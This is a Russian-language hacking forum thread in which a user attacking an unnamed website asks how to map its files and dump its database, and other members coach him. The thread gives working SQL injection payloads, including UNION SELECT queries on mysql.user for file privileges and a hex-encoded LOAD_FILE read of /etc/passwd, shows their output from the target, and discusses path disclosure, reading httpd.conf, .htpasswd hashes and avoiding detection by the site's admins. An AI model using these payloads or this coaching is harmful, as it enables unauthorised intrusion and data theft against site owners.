Просмотр полной версии : Помогите узнать файловую структуру сайта
Здравствуйте!
Бьюсь уже второй день над одним сайтом. Узнал список всех баз и таблиц, мускул: VERSION - 5.0.45-log
Подскажите как проверить есть привилегии file на сервере.
Мне по зарез нужно узнать файловую структуру, чтобы минимум скачать базу данных, максимум сам сайт.
И если включен file, то как еще можно хотя бы просмотреть файловую структуру?
Спасибо
Вот что еще удалось узнать
/usr/local/mysql/ basedir
/usr/local/mysql/var/ datadir
/tmp/ tmpdir
pc-linux-gnu version_compile_os
При выподнении лоадфайл ошибок никаких не выдавало, но и текста тоже никакого не было.
Значит привилегии file на сервере нет.
Подскажите как можно другим способом узнать файловую с-ру сайта? И слить базу
во-первых узнай текущего пользователя ( user() )и если это root то file_priv скорее всего есть
во-вторых в mysql.user ( я так понял ты можешь прочесть эту таблицу) есть поле file_priv посмотри ее для того пользователя под которым работает скрипт union select file_priv from mysql.user where user=left(user(),locate(0x40,user())-1)/*это я сейчас выпендрился не обращай внимания (на случай если кавычка фильтруется) ;)
в-третьих попробуй узнать версию ОС: union select @@version_compile_os /* если freeBSD или SunOS пиши ко мне в ЛС - помогу, но скорее всего Linux все же у тебя
если у тебя нет доступа к mysql.user пробуй загрузить /etc/passwd union select LOAD_FILE(0x2F6574632F706173737764) /*
если вывелся файл passwd то file_priv есть, если ничего не вывелось, то file_priv скорее всего нет
если тебе повезло и file_priv есть, попытайся вызвать на сайте ошибку с раскрытием путей, если не получилось почитай статью http://forum.antichat.ru/thread30632.html и поищи файл httpd.conf (правда не факт, что хватит прав на чтение)
эх, долго я писал, блин, но лан пусть будет, а то вопросы про это частенько возникают, скопипастить будет откуда
intellitamper - я просканировал сайт этой прогой. Есть структура.
Как думаете админы не попалят что их сканировали?
LOAD_FILE(0x2F6574632F706173737764) /* выполнял ничего не выводит((((((((
Выполнил такой код:
&id=-1+union+select+1,2,3,4,5,6,7,file_priv,9,user+from +mysql.user/*
Y root
N puma
N as
Получается у меня есть файл прив?
выполни такой:
&id=-1+union+select+1,2,3,4,5,6,7,file_priv,9,10 from mysql.user where user=left(user(),locate(0x40,user())-1)/*
да и вобще что функция user() возвращает?
выполни такой:
&id=-1+union+select+1,2,3,4,5,6,7,file_priv,9,10 from mysql.user where user=left(user(),locate(0x40,user())-1)/*
да и вобще что функция user() возвращает?
по этому запросу N :(
юзер возвращает puma
Да.. не очень сдесь отзывчивые пользователи...
На этом сайте проводится аутенфикация админов с помощью апача. Тоесть по идее пароли лежат в файлах..
Кто-то имел опыт "работы" с такой аутенфикацией?
ты имеешь ввиду хттп авторизацию? если да тогда, пасс могут быть . htpasswd примерно такой формат
123:$apr1$REDnNbWG$/JCaNJcKjz9jDyckyQc7i/ (123;123)
могут быть в скриптах, может пасс и логин проверяться из бд. По ходу у тя просто не привелегий поэтому не можешь записать.
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot